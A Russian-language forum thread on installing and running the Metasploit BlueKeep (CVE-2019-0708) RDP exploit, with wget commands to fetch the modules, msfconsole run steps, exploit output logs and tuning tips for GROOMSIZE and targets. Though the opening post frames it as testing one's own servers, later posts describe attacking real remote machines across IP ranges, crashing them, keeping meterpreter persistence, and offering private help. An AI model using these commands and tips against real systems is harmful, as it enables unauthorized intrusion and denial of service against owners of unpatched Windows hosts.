Soft Metasploit Эксплоит BlueKeep (CVE-2019-0708)

Вышел публичный эксплоит на уязвимость BlueKeep (CVE-2019-0708). Теперь он есть в составе Metasploit Framework, но пока еще не появился в deb пакетах.

Ссылка скрыта от гостей

Выпущенный эксплоит работает на следующих ОС и конфигурациях:
1 Windows 7 SP1 / 2008 R2 (6.1.7601 x64)
2 Windows 7 SP1 / 2008 R2 (6.1.7601 x64 - Virtualbox)
3 Windows 7 SP1 / 2008 R2 (6.1.7601 x64 - VMWare)
4 Windows 7 SP1 / 2008 R2 (6.1.7601 x64 - Hyper-V)

Для тех, кто хочет проверить СВОИ сервера на возможность практической реализации уязвимости, данный эксплоит его можно поставить вручную, для этого нужно с гитхаба скопировать ряд файлов и установить их в Metasploit.
Ниже привожу набор команд для установки эксплоита (пути указаны для стандартной установки Metasploit в Kali Linux):

cd ~
mkdir backup
mkdir msf
mv /usr/share/metasploit-framework/lib/msf/core/exploit/rdp.rb ~/backup/msf
mv /usr/share/metasploit-framework/modules/auxiliary/scanner/rdp/cve_2019_0708_bluekeep.rb ~/backup/msf
mv /usr/share/metasploit-framework/modules/auxiliary/scanner/rdp/rdp_scanner.rb ~/backup/msf

wget -O /usr/share/metasploit-framework/lib/msf/core/exploit/rdp.rb https://raw.githubusercontent.com/rapid7/metasploit-framework/edb7e20221e2088497d1f61132db3a56f81b8ce9/lib/msf/core/exploit/rdp.rb

wget -O /usr/share/metasploit-framework/modules/auxiliary/scanner/rdp/cve_2019_0708_bluekeep.rb https://raw.githubusercontent.com/rapid7/metasploit-framework/edb7e20221e2088497d1f61132db3a56f81b8ce9/modules/auxiliary/scanner/rdp/cve_2019_0708_bluekeep.rb

wget -O /usr/share/metasploit-framework/modules/auxiliary/scanner/rdp/rdp_scanner.rb https://raw.githubusercontent.com/rapid7/metasploit-framework/edb7e20221e2088497d1f61132db3a56f81b8ce9/modules/auxiliary/scanner/rdp/rdp_scanner.rb

mkdir /usr/share/metasploit-framework/modules/exploits/windows/rdp
wget -O /usr/share/metasploit-framework/modules/exploits/windows/rdp/cve_2019_0708_bluekeep_rce.rb https://raw.githubusercontent.com/rapid7/metasploit-framework/edb7e20221e2088497d1f61132db3a56f81b8ce9/modules/exploits/windows/rdp/cve_2019_0708_bluekeep_rce.rb

Далее стандартный запуск:

msfconsole
use exploit/windows/rdp/cve_2019_0708_bluekeep_rce
set rhosts 127.0.0.1
run

И если потребуется вернуть все на место:

mv ~/backup/msf/rdp.rb /usr/share/metasploit-framework/lib/msf/core/exploit/
mv ~/backup/msf/cve_2019_0708_bluekeep.rb /usr/share/metasploit-framework/modules/auxiliary/scanner/rdp/
mv ~/backup/msf/rdp_scanner.rb /usr/share/metasploit-framework/modules/auxiliary/scanner/rdp/
rm -rf /usr/share/metasploit-framework/modules/exploits/windows/rdp/cve_2019_0708_bluekeep_rce.rb
rm -rf ~/backup/

Удачных тестирований на проникновение!

 

[zhe_ka]

За что отвечает параметр GROOMSIZE? Если я ставлю значение меньше 50, то машина ловит BSOD, если больше то обрывается соединение, но в любом случае появляется вот штука:
0xfffffa8013200000, Channel count 0, а должно быть Channel count 1 при удачном соединении, я так понял

 

[Tony]

За что отвечает параметр GROOMSIZE?

Количество памяти в MB которое эксплойт будет заспамливать шелкодом.

0xfffffa8013200000, Channel count 0, а должно быть Channel count 1 при удачном соединении, я так понял

При Channel count 0 эксплойт пишет в память по каналу MS_T120, при Channel count 1 он также спамит по каналу RDPSND т.к. MS_T120 не работает в win2k8.

 

[Петручо]

Количество памяти в MB которое эксплойт будет заспамливать шелкодом.

При Channel count 0 эксплойт пишет в память по каналу MS_T120, при Channel count 1 он также спамит по каналу RDPSND т.к. MS_T120 не работает в win2k8.

а где можно почитать точные значения переменных и вообще толковую инфу , а то что находится мало что объясняет в техническом плане.
а этот сплойт меня вообще в ступор ставит. ставил тестовые виртуалки , раньше этот сплойт писал что цели уязвимы ,но не пробивал по разным причинам . а потом все виртуалки стали неузявимыми для него , хотя они вообще без изменений , более того новые виртуалки накидывал без обнов и прочего (и 2003 и 32 и 64 бита , и 2008 что обычная что R2) , то есть чистый инстал . и все они стали неузявимыми , думал что может я че с настройками сплойта намудрил , но со свежей кали этот сплойт опять пишет что они все неуязимы .
я понять не мог , как не обновляясь (вообще доступа в нет у них нету) и не перенастраиваясь (2003я сказала что она стала неуязвимой после того как активировал сервер лицензий терминалов ,но это одна виртуалка которую настраивал после инстала) они стали из уязвимых неузявимыми .
ну и вдогонку , вначале пропустил лист с реальными rdp серверами в сети , нашел несколько уязвимых , после этого даже эти же сервера стали неуязвимыми .
чудеса на виражах да и только .

 

[Tony]

а где можно почитать точные значения переменных и вообще толковую инфу , а то что находится мало что объясняет в техническом плане.
а этот сплойт меня вообще в ступор ставит. ставил тестовые виртуалки , раньше этот сплойт писал что цели уязвимы ,но не пробивал по разным причинам . а потом все виртуалки стали неузявимыми для него , хотя они вообще без изменений , более того новые виртуалки накидывал без обнов и прочего (и 2003 и 32 и 64 бита , и 2008 что обычная что R2) , то есть чистый инстал . и все они стали неузявимыми , думал что может я че с настройками сплойта намудрил , но со свежей кали этот сплойт опять пишет что они все неуязимы .
я понять не мог , как не обновляясь (вообще доступа в нет у них нету) и не перенастраиваясь (2003я сказала что она стала неуязвимой после того как активировал сервер лицензий терминалов ,но это одна виртуалка которую настраивал после инстала) они стали из уязвимых неузявимыми .
ну и вдогонку , вначале пропустил лист с реальными rdp серверами в сети , нашел несколько уязвимых , после этого даже эти же сервера стали неуязвимыми .
чудеса на виражах да и только .

Почитать толко в коде эксплойта). Все настройки и опции ни как не влияют на определение уязвима/неуязвима. В случае с 2k8 эксплойт покажет, что система уязвима, но в память сможет писать только при условии, если в системе значение ключа "HKLM\SYSTEM\CurrentControlSet\Control\TerminalServer\Winstations\RDP-Tcp\fDisableCam" равно нулю. В остальном, приведи конкретный пример что не получается.

 

[Петручо]

в общем на большинстве виртуалок пишет такое
[*] Started reverse TCP handler on 192.168.13.101:4444
[-] 192.168.13.3:3389 - Exploit aborted due to failure: not-vulnerable: Set ForceExploit to override
[*] Exploit completed, but no session was created.
у меня туева хуча виртуалок и я уже запутался че и где в плане тестов bluekeep ,
то что выложил это 2003 64 бита , но открыто окно gpedit может в этой виртуалке после и ковырял чего (уже не помню что я на ней делал) .
сейчас попробую еще чистый инстал сделать , что бы чисто его потестить . отпишу чуть позже

 

[Tony]

то что выложил это 2003 64 бита

Насколько я знаю он не работает с Win2K3, только с Win7 и Win2K8.

 

[Петручо]

Насколько я знаю он не работает с Win2K3, только с Win7 и Win2K8.

хз на счет работает , но сама уязвимость идет на всех NT винтах , начиная с NT и до 2012 , а дыры названные блюкип2 уже и десятку и в 2016 затрагивают .


кстати поставил с нуля 2003 и просто включил роль сервера терминалов , без настройки пользователей и прочего и выдало
[*] Started reverse TCP handler on 192.168.13.101:4444
[+] 192.168.13.1:3389 - The target is vulnerable. The target attempted cleanup of the incorrectly-bound MS_T120 channel.
[-] 192.168.13.1:3389 - Exploit aborted due to failure: bad-config: Set the most appropriate target manually. If you are targeting 2008, make sure fDisableCam=0 !
[*] Exploit completed, but no session was created.
так как таргет не 2008 fDisableCam=0 в реестре исправлять не нужно .
по ходу нужно GROOMSIZE подобрать ?

после выставления set target 2 ошибка поменялась
[*] Started reverse TCP handler on 192.168.13.101:4444
[+] 192.168.13.1:3389 - The target is vulnerable. The target attempted cleanup of the incorrectly-bound MS_T120 channel.
[-] 192.168.13.1:3389 - Exploit failed: Msf::Exploit::Remote::RDP::RdpCommunicationError Msf::Exploit::Remote::RDP::RdpCommunicationError
[*] Exploit completed, but no session was created.
вот тут куда смотреть ?

 

[zhe_ka]

Ну как успехи? У кого нибудь получилось подключится к реальной машине?

 

[UnicMember]

Надо не на одном уязвимом компе испытывать
У кого не получается пишите в лс могу помочь

 

[lecbit]

У меня ничего не происходит после этой строки, просто замирает "Lobbing eggs ..."

ФОТО

 

[RavenHack]

Для понимания нюансов почитайте тут:

Ссылка скрыта от гостей

[*] Started reverse TCP handler on 80.255.3.94:7443
[*] 10.0.0.12:3389        - Detected RDP on 10.0.0.12:3389        (Windows version: 6.0.6001) (Requires NLA: No)
[+] 10.0.0.12:3389        - The target is vulnerable.
[*] 10.0.0.12:3389 - Using CHUNK grooming strategy. Size 250MB, target address 0xfffffa8013200000, Channel count 1.
[*] 10.0.0.12:3389 - Surfing channels ...
[*] 10.0.0.12:3389 - Lobbing eggs ...
[-] 10.0.0.12:3389 - Exploit failed: OpenSSL::SSL::SSLError SSL_write: protocol is shutdown
[*] Exploit completed, but no session was created.

Has anyone encountered this?

Привет ! Сокет откинул подключение ! Возможно Антивирус установлен а служба не пропатчена , по этому и сканер показывает что хост уязвим но полезная нагрузка или в твоем случае переполнение буфера пямяти палят AV !

У меня ничего не происходит после этой строки, просто замирает "Lobbing eggs ..."

ФОТО

Посмотреть вложение 39809

Добавляйте вербальность в метасплойте set verbose true и начинайте вникать что происходит в процессе эксплотации и тогда вы сможете сформировать вопрос и задать его на более продвинутом уровне ! также много советов играться с параметрами GROOMSIZE кто то советует значение 50 для вертуальных машин !

 

[InetTester]

Как вариант пустить его через burp, и попробовать глянуть что происходит...

 

[pr0phet]

Как вариант пустить его через burp, и попробовать глянуть что происходит...

Рдп через бурп? Скорее wireshark или tcpdump

 

[RavenHack]

Как вариант пустить его через burp, и попробовать глянуть что происходит...

Зачем ? путем повывышения вербальности видны все этапы эксплойта и проблема популярно написана !

 

[InetTester]

Рдп через бурп? Скорее wireshark или tcpdump

согласен.

 

[Alois]

У меня та же самая проблема, что и у всех. Удаленные системы сваливаются в BSOD, перестают пинговаться, через несколько минут просыпаются. TARGET и GROOMSIZE менял. Атаки провожу с удаленного сервера со статическим IP.

 

[Alois]

Начал пробовать другие диапазоны IP, в некоторых физические компьютеры ломаются на ура с любыми значениями GROOMSIZE (50, 100, 150, 200, 250). Правда, ломаются нестабильно, а через раз. То есть, один и тот же компьютер может утром взламываться, днем нет, а вечером опять взламывается. Ломать приходится снова из-за того, что персистенс не соединяется с моим хостом, когда я выхожу из метерпретер.

 

[hellotester]

сессию в бекграунд уводи

 

[Alois]

сессию в бекграунд уводи

Как вариант можно и так, но тогда придется для каждой сессии включать свой screen, правда, это несложно.

 

[zhe_ka]

Кто нибудь поможет? Обновил версию MSF до последней, кидаю туда файлы (как сделано в инструкции в начале темы), bluekeep эксплоит не запускается, запускается только сканнер, закидываю обратно официальный, скачанный вместе с MSF, работает. Возможно официальный уже полноценно работает?